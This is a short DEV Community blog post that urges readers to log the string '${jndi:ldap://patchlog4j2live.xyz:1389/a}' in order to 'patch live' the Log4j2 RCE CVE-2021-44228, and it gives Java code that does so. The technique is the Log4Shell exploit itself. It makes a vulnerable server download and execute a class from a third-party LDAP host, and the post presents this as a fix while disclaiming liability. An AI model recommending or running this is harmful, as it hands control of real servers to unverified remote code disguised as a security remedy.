DEV Community

Nitin Bansal
Nitin Bansal

Posted on

Use this to automatically patch running log4j2 vulnerability... no need to restart the server

Log your message with following to patch your server LIVE against Log4j2 RCE (CVE-2021-44228):

logger.error("${jndi:ldap://patchlog4j2live.xyz:1389/a}");
Enter fullscreen mode Exit fullscreen mode

This will automatically patch your running log4j instance and remove remote lookups, thus, sub-siding the RCE (CVE-2021-44228).

You can verify with following codebase(use vulnerable version of log4j to test obviously 🤷‍♂️):

public class log4j {
    private static final Logger logger = LogManager.getLogger(log4j.class);

    public static void main(String[] args) {
        // This will hit the server and download the class that will patch live log4j
        logger.error("${jndi:ldap://patchlog4j2live.xyz:1389/a}");

        // The RCE should not work now... if you still see message printed
        // such as: "FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS",
        // that means the patch didn't work.
        // Raise issue here: https://github.com/freakynit/Logout4Shell
        // or here (original version): https://github.com/Cybereason/Logout4Shell
        logger.error("${jndi:ldap://patchlog4j2live.xyz:1389/a}");
    }
}
Enter fullscreen mode Exit fullscreen mode

This is based on this awesome codebase by Cybereason: https://github.com/Cybereason/Logout4Shell

Safe logging...

Disclaimer: I will not be liable for anything good, or bad, happening from using above. This is solely for a quick resolution.

Top comments (0)